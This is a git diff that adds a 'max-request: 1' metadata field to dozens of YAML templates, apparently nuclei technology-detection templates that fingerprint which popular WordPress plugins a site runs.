diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
